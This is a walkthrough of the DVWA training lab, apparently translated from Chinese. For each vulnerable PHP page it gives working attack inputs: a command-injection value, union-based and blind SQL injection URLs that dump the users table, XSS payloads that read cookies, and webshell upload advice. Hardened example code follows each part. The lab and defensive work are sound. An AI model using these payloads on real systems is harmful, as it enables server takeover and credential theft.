Brute Force
Simple: see section "0x01 Brute Force (brute-force vulnerability)" of the Pikachu walkthrough post (pikachu通关全记录).
Command Injection
```php
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}
?>
```
From the source we can see that the user-supplied ip value is concatenated straight into a ping command line and run as a system command; depending on whether the server is Windows NT, a different ping is issued against the target IP. Nothing is validated or escaped, so shell operators in the value are interpreted by the shell.
- 8.142.189.231 || ipconfig gives the result shown in the original screenshot.
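As an added example (not DVWA's own code), here is a hardened version of the same handler. It validates that the target is a literal IP address with filter_var() and still quotes the value with escapeshellarg() before the shell sees it; the function names are this example's own. The demonstration at the bottom only prints the command string that would be built, it does not run ping.

```php
<?php
// Added example, not DVWA's own code: a hardened version of the ping handler.
// Two independent controls are applied: the target must parse as an IP
// address, and the value is still quoted with escapeshellarg() before it is
// handed to the shell. Function names are this example's own.

declare(strict_types=1);

// Returns the command line to run, or null if the input is rejected.
function build_ping_command(string $target): ?string
{
    // Reject anything that is not a literal IPv4/IPv6 address. The whole
    // string is validated, so "8.142.189.231 || ipconfig" fails here.
    if (filter_var($target, FILTER_VALIDATE_IP) === false) {
        return null;
    }

    // Defence in depth: the validated value is still passed as one quoted
    // argument, so shell metacharacters could not break out of it.
    $arg = escapeshellarg($target);

    if (stristr(php_uname('s'), 'Windows NT') !== false) {
        return 'ping ' . $arg;        // Windows: default of 4 echo requests
    }
    return 'ping -c 4 ' . $arg;       // *nix: limit to 4 echo requests
}

// Request handler: reads from $_POST only (the original reads $_REQUEST,
// which also accepts GET parameters and cookies).
function handle_ping_request(array $post): string
{
    if (!isset($post['ip'])) {
        return '<pre>No target given.</pre>';
    }
    $cmd = build_ping_command((string) $post['ip']);
    if ($cmd === null) {
        // Fixed message: the rejected value is not echoed back.
        return '<pre>Invalid IP address.</pre>';
    }
    $out = (string) shell_exec($cmd);
    // Command output is HTML-encoded before it is embedded in the page.
    return '<pre>' . htmlspecialchars($out, ENT_QUOTES, 'UTF-8') . '</pre>';
}

// Demonstration with constructed inputs: only the command string that would
// be run is printed, nothing is executed.
foreach (['127.0.0.1', '::1', '8.142.189.231 || ipconfig'] as $input) {
    printf("%-28s => %s\n", $input, build_ping_command($input) ?? 'REJECTED');
}
```

The allow-list check (FILTER_VALIDATE_IP) is the control that actually stops the payload; escapeshellarg() is kept as a second layer so that a later change to the validation cannot silently reintroduce the bug.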
CSRF
Observe the URL:
http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=%E6%94%B9%E5%8F%98#
Look at the source:
```php
<?php
if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
```
From the source we can see there is no protection at all: no token, no CAPTCHA, nothing, and the password change is even accepted over a plain GET request. Simply send the link to the user and have them click it, and the attack is complete!
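As an added example (not DVWA's own code), the following shows the standard fix: a per-session anti-CSRF token carried in a hidden field, checked with hash_equals() and rotated after use, with the change accepted only via POST. The field name user_token, the $update callback and the constructed session array are this example's own assumptions.

```php
<?php
// Added example, not DVWA's own code: an anti-CSRF token for the
// password-change form. The token lives in the session, is sent back in a
// hidden field, is compared in constant time and is rotated after use.
// The field name user_token and the $update callback are this example's own.

declare(strict_types=1);

// Mint a token once per session (the array stands in for $_SESSION).
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Verify the token that arrived with a state-changing request.
function csrf_check(array $session, ?string $submitted): bool
{
    if (empty($session['csrf_token']) || $submitted === null) {
        return false;
    }
    return hash_equals($session['csrf_token'], $submitted);
}

// The form carries the token in a hidden field and submits via POST, so a
// plain link like the one in the page's URL can no longer trigger the change.
function render_change_form(array &$session): string
{
    $t = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<form method="post">'
        . '<input type="hidden" name="user_token" value="' . $t . '">'
        . 'New password: <input type="password" name="password_new"><br>'
        . 'Confirm: <input type="password" name="password_conf"><br>'
        . '<input type="submit" name="Change" value="Change">'
        . '</form>';
}

// Handle the POSTed change; $update receives the password hash to store.
function handle_change(array &$session, array $post, callable $update): string
{
    if (!isset($post['Change'])) {
        return render_change_form($session);
    }
    if (!csrf_check($session, $post['user_token'] ?? null)) {
        return '<pre>CSRF token is incorrect.</pre>';
    }
    $new  = (string) ($post['password_new'] ?? '');
    $conf = (string) ($post['password_conf'] ?? '');
    if ($new === '' || $new !== $conf) {
        return '<pre>Passwords did not match.</pre>';
    }
    // Single use: a token that leaked cannot be replayed.
    unset($session['csrf_token']);
    $update(password_hash($new, PASSWORD_DEFAULT));
    return '<pre>Password Changed.</pre>';
}

// Demonstration with a constructed session array and a counting update callback.
$session = [];
$updates = 0;
$update  = function (string $hash) use (&$updates): void { $updates++; };

// 1. A forged cross-site request carries no token: rejected.
echo handle_change($session, ['Change' => 1, 'password_new' => 'pw', 'password_conf' => 'pw'], $update), "\n";

// 2. The real user loads the form (which mints the token) and submits it back.
render_change_form($session);
$token = $session['csrf_token'];
echo handle_change($session, ['Change' => 1, 'user_token' => $token,
                              'password_new' => 'pw', 'password_conf' => 'pw'], $update), "\n";

// 3. Replaying the same token fails because it was rotated.
echo handle_change($session, ['Change' => 1, 'user_token' => $token,
                              'password_new' => 'pw', 'password_conf' => 'pw'], $update), "\n";
echo "updates stored: $updates\n";
```

Moving the change to POST alone is not enough (a hidden auto-submitting form can POST cross-site); the token is what ties the request to a page the user actually loaded. password_hash() replaces the md5() of the original, which is a separate weakness in the same code.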
File Inclusion
```php
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
```
- http://127.0.0.1/dvwa/vulnerabilities/fi/?page=E:/phpstudy/WWW/123.txt
- reads 123.txt under www;
- result shown in the original screenshot.
From the screenshot above we can see that this vulnerability can be exploited as a file inclusion flaw, both local and remote: local file inclusion to read information on the server, remote inclusion of a shell, and so on.
I don't know why a relative path doesn't work? I tried remote file inclusion and it did not succeed; setting aside environment problems, remote file inclusion should be possible.
Fixes:
1. Disable remote file inclusion: allow_url_include=off
2. Set open_basedir to a specific directory to restrict the accessible area.
3. Filter ../ and other special sequences.
4. Change the location where Apache log files are stored.
5. Enable magic quotes: magic_quotes_gpc=on
6. Avoid selecting files through dynamic variables; write the file to be included directly.
File Upload
```php
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>
```
No filtering at all is applied to the uploaded file, so a PHP file can be uploaded directly; include a one-liner webshell in it and connect with a tool such as Caidao (菜刀) or AntSword (蚁剑). Or generate a PHP file with metasploit and connect to that!!!
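As an added example (not DVWA's own code), the upload handler below accepts only files whose bytes are a JPEG or PNG, assigns a server-chosen random name with an extension derived from the detected type, and never uses the client's file name or Content-Type. The size limit, the store_image_upload() function and the constructed sample files are this example's own; in a real handler the rename() call becomes move_uploaded_file().

```php
<?php
// Added example, not DVWA's own code: validate an uploaded image before it is
// written, store it under a server-chosen name, and never trust the
// client-supplied file name or Content-Type.

declare(strict_types=1);

const MAX_UPLOAD_BYTES = 100000;
const ALLOWED_TYPES = [          // detected MIME type => extension we assign
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];

// Returns [true, storedPath] on success or [false, errorMessage] on rejection.
function store_image_upload(array $file, string $uploadDir): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'Upload failed.'];
    }
    if ($file['size'] > MAX_UPLOAD_BYTES) {
        return [false, 'File too large.'];
    }
    // Sniff the real content type from the bytes, not from $file['type'].
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        return [false, 'Only JPEG and PNG images are accepted.'];
    }
    // getimagesize() must also agree that the file parses as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        return [false, 'File is not a valid image.'];
    }
    // Server-chosen name: the original name and its extension are discarded,
    // so "shell.php" can never be written as .php.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = rtrim($uploadDir, '/\\') . DIRECTORY_SEPARATOR . $name;
    // In a request handler use move_uploaded_file(); rename() lets the
    // demonstration below run from the CLI.
    if (!rename($file['tmp_name'], $dest)) {
        return [false, 'Could not store file.'];
    }
    return [true, $dest];
}

// Demonstration with constructed files in a temporary directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'up_demo_' . bin2hex(random_bytes(4));
mkdir($dir);

// A PHP script given an image-like name by the client.
$bad = tempnam($dir, 'u');
file_put_contents($bad, "<?php echo 'not an image';\n");
// A constructed 1x1 PNG.
$good = tempnam($dir, 'u');
file_put_contents($good, base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
));

foreach ([['name' => 'shell.php', 'tmp_name' => $bad],
          ['name' => 'photo.png', 'tmp_name' => $good]] as $f) {
    // Client-controlled fields, deliberately set to look like an image.
    $f += ['error' => UPLOAD_ERR_OK, 'size' => filesize($f['tmp_name']), 'type' => 'image/png'];
    [$ok, $msg] = store_image_upload($f, $dir);
    printf("%-10s => %s\n", $f['name'], $ok ? 'stored as ' . basename($msg) : $msg);
}
```

Two further controls belong outside this code: the upload directory should be served with PHP execution disabled (for example, no handler for .php there), and the stored path should not be echoed back to the client the way the original does.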
Insecure CAPTCHA
- Environment not set up yet; will come back to it later.
SQL Injection
```php
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            mysqli_close($GLOBALS["___mysqli_ston"]);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
            #$sqlite_db_connection->enableExceptions(true);

            $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}
?>
```
From the code: the id parameter is passed in via GET, concatenated on the back end into "SELECT first_name, last_name FROM users WHERE user_id = '$id';" and executed.
Confirm the injection and probe the column count:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' and '1'='1&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' and '1'='2&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 5--+&Submit=Submit#
Find the number of columns:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27%20order%20by%202--+&Submit=Submit#
Query the operating system and version:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=0%27%20union%20select%201,2--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2%27%20union%20select%20database(),version()%20--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2%27%20union%20select%20@@version_compile_os,version()%20--+&Submit=Submit#
- Result: database name dvwa, version 5.5.53, operating system Win32
List all database names:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(schema_name),1 from information_schema.schemata --+&Submit=Submit#
List all tables in the dvwa database:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(table_name),1 from information_schema.tables where table_schema=database() --+&Submit=Submit#
Or:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(table_name),1 from information_schema.tables where table_schema='dvwa' --+&Submit=Submit#
List all column names of the users table:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(column_name),1 from information_schema.columns where table_name='users' --+&Submit=Submit#
Dump all values of the users table:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(user_id,0x3a,user,0x2c,password,0x3b),1 from users --+&Submit=Submit#
SQL Injection (Blind)
Determine whether the injection is numeric or string-based:
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1 and 1=3&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20%271%27=%273&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20%271%27=%271&Submit=Submit#
- Conclusion: the injection is string-based, using a single quote.
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20length(database())%3E5%20--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20length(database())=4%20--+&Submit=Submit#
- So the database name is 4 characters long.

| Input | Result |
|---|---|
| 1' and ascii(substr(database(),1,1))>97# | Row shown: the first character is a lowercase letter other than a |
| 1' and ascii(substr(database(),1,1))=100# | Row shown: the first character is d |
| 1' and ascii(substr(database(),2,1))=118# | Row shown: the second character is v |
| 1' and ascii(substr(database(),3,1))=119# | Row shown: the third character is w |
| 1' and ascii(substr(database(),4,1))=97# | Row shown: the fourth character is a |

- Database name: dvwa

Determine the length of the table names:

| Input | Result |
|---|---|
| 1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>10# | No row |
| 1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>8# | Row shown: the first table in dvwa has a 9-character name |
| 1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=9# | Row shown: confirmed |

Likewise the length of the second table's name can be guessed:

| Input | Result |
|---|---|
| 1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=5# | Row shown: the second table in dvwa has a 5-character name |

- Ugh! It's just trying over and over; the method is as shown above. I wrote up the full blind injection process in another post of mine: click to jump
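Both the SQL Injection and the Blind section above exploit the same string concatenation, so one fix serves both. As an added example (not DVWA's own code), the lookup is rewritten with a prepared statement and a type check, and run against a constructed in-memory SQLite database (PHP's sqlite3 extension) so the contrast with concatenation can be observed offline. The function names and sample rows are this example's own; for the MySQL branch the equivalent is mysqli_prepare() with bind_param().

```php
<?php
// Added example, not DVWA's own code: the user lookup written with a
// prepared statement, run against a constructed in-memory SQLite database so
// the contrast with string concatenation can be observed offline. For the
// MySQL branch the equivalent is mysqli_prepare() with bind_param().

declare(strict_types=1);

function make_demo_db(): SQLite3
{
    $db = new SQLite3(':memory:');
    $db->enableExceptions(true);
    $db->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)');
    // Constructed sample rows.
    $db->exec("INSERT INTO users VALUES (1,'admin','admin'), (2,'Gordon','Brown'), (3,'Hack','Me')");
    return $db;
}

// Vulnerable shape, as in the page's source: the value becomes SQL text.
function lookup_concat(SQLite3 $db, string $id): array
{
    $res  = $db->query("SELECT first_name, last_name FROM users WHERE user_id = '$id';");
    $rows = [];
    while ($row = $res->fetchArray(SQLITE3_ASSOC)) {
        $rows[] = $row;
    }
    return $rows;
}

// Hardened shape: check the type, then bind the value as data, never as SQL.
function lookup_prepared(SQLite3 $db, string $id): ?array
{
    // user_id is an integer column; anything else is rejected before the query.
    if (filter_var($id, FILTER_VALIDATE_INT) === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id');
    $stmt->bindValue(':id', (int) $id, SQLITE3_INTEGER);
    $res  = $stmt->execute();
    $rows = [];
    while ($row = $res->fetchArray(SQLITE3_ASSOC)) {
        $rows[] = $row;
    }
    return $rows;
}

$db = make_demo_db();
$inputs = [
    '2',              // normal request
    "2' and '1'='1",  // the page's true-condition probe: concatenation still returns the row
    "2' and '1'='2",  // the page's false-condition probe: concatenation returns nothing
];
foreach ($inputs as $in) {
    $prepared = lookup_prepared($db, $in);
    printf("%-18s concat: %d row(s)   prepared: %s\n",
        json_encode($in),
        count(lookup_concat($db, $in)),
        $prepared === null ? 'REJECTED' : count($prepared) . ' row(s)');
}
```

The true/false pair is exactly what the blind technique depends on: with concatenation the two probes return different results, which leaks one bit per request; with the bound parameter both are rejected before any SQL runs, so there is no difference to observe. The original's mysqli_real_escape_string() (used in the CSRF page) is not a substitute, because it only escapes quotes inside a string literal and does nothing for a numeric context.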
XSS (DOM)
127.0.0.1/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script>
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS (Reflected)
127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<script>alert(1)</script>#
- Baffling: there is no filtering at all.
XSS (Stored)
- Ugh! Also no filtering at all.
The difference with stored XSS is that it does not go away when the page is reloaded: the payload is saved in the database, and the script runs again every time the page is refreshed.
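As an added example (not DVWA's own code), the fix for the reflected and stored cases is output encoding at the point where the value is written into the page, chosen per context. The render_* functions, the sample guestbook row and the inline-script case are this example's own; the payloads are the ones from the URLs above.

```php
<?php
// Added example, not DVWA's own code: encode untrusted values at the point
// where they are written into the page, once per output context. The render_*
// functions and the sample rows are this example's own.

declare(strict_types=1);

// HTML body and attribute context.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Reflected XSS page: the "name" parameter is echoed back.
function render_greeting(?string $name): string
{
    return '<pre>Hello ' . h((string) $name) . '</pre>';
}

// Stored XSS page: guestbook rows read back from the database. Encoding
// happens on output, so it holds for every row however it got into the table.
function render_guestbook(array $rows): string
{
    $out = '';
    foreach ($rows as $row) {
        $out .= '<div>Name: ' . h($row['name'])
              . '<br />Message: ' . h($row['comment']) . '<br /></div>' . "\n";
    }
    return $out;
}

// JavaScript string context (a value the server writes into an inline
// script): HTML encoding is the wrong tool here; JSON-encode with the HEX
// flags so that "</script>" cannot close the block.
function render_js_default(string $default): string
{
    $json = json_encode($default, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return '<script>var defaultLang = ' . $json . ';</script>';
}

// The page's payload as constructed input.
$payload = '<script>alert(document.cookie)</script>';
echo render_greeting($payload), "\n";
echo render_guestbook([['name' => 'test', 'comment' => $payload]]);
echo render_js_default($payload), "\n";
```

The DOM-based variant is different in kind: the value is taken from the URL and written by client-side JavaScript, so server-side encoding never sees it. There the fix is in the script itself (do not write URL-derived data with document.write or innerHTML; assign it with textContent or build the element through the DOM API), and a Content-Security-Policy without unsafe-inline limits what an injected script can do in all three cases.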